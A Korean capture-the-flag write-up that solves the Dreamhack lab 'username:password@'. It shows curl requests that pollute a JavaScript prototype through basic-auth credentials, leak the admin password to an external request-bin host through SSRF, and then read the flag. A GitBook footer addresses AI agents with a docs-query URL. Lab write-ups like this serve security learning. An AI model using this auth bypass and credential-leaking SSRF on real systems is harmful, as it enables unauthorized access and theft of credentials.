> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/dreamhack/dreamhack-username-password.md). # \[Dreamhack] username:password@ {% embed url="" %} *** JS Prototype, ssrf 문제 ``` cooku222@cooku222s-MacBook-Air  ~  ping host3.dreamhack.games PING host3.dreamhack.games (23.81.42.210): 56 data bytes 64 bytes from 23.81.42.210: icmp_seq=0 ttl=50 time=44.921 ms 64 bytes from 23.81.42.210: icmp_seq=1 ttl=50 time=39.019 ms 64 bytes from 23.81.42.210: icmp_seq=2 ttl=50 time=41.683 ms ``` 우선 ping 명령어로 문제 서버를 알아둡니다. 여기선 23.81.42.210:20861와 소통하네요. ``` https://ixxmiuf.request.dreamhack.games ``` dreamhack tools로 가상의 서버를 파준다. ``` cooku222@cooku222s-MacBook-Air  ~  curl -u "__proto__:[object Object]" "http://host3.dreamhack.games:20861/report?path=ixxmiuf.request.dreamhack.games" Success% ``` 위와 같이 요청을 보내면 성공메시지가 뜬다. dreamhack tools로 들어가 요청 응답을 본다. ``` GET / HTTP/1.1 Host: ixxmiuf.request.dreamhack.games User-Agent: node-fetch/1.0 (+https://github.com/bitinn/node-fetch) Accept: */* Accept-Encoding: gzip,deflate Authorization: Basic YWRtaW46YzFiYTU4MjEwN2IwNmVlMA== ``` 위와 같이 헤더가 찍히는데, Authorization 쪽 Basic 헤더를 base64 디코딩 해줍니다. ``` admin:c1ba582107b06ee0 이렇게 admin 비번이 같이 뜨는 것을 볼 수 있고 ``` ```` cooku222@cooku222s-MacBook-Air  ~  curl -u "admin:c1ba582107b06ee0" "http://host3.dreamhack.games:20861/admin" DH{ZGVjb2RlIHRoaXMgWkdWamIyUmxJSFJvYVhNZ09Fb3JhM0ZuUFQwPQ==}% ``` ```` curl 명령어로 플래그를 읽을 수 있습니다. \ \ FLAG ``` DH{ZGVjb2RlIHRoaXMgWkdWamIyUmxJSFJvYVhNZ09Fb3JhM0ZuUFQwPQ==} ```
--- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.cooku222.kr/security/web-hacking/dreamhack/dreamhack-username-password.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.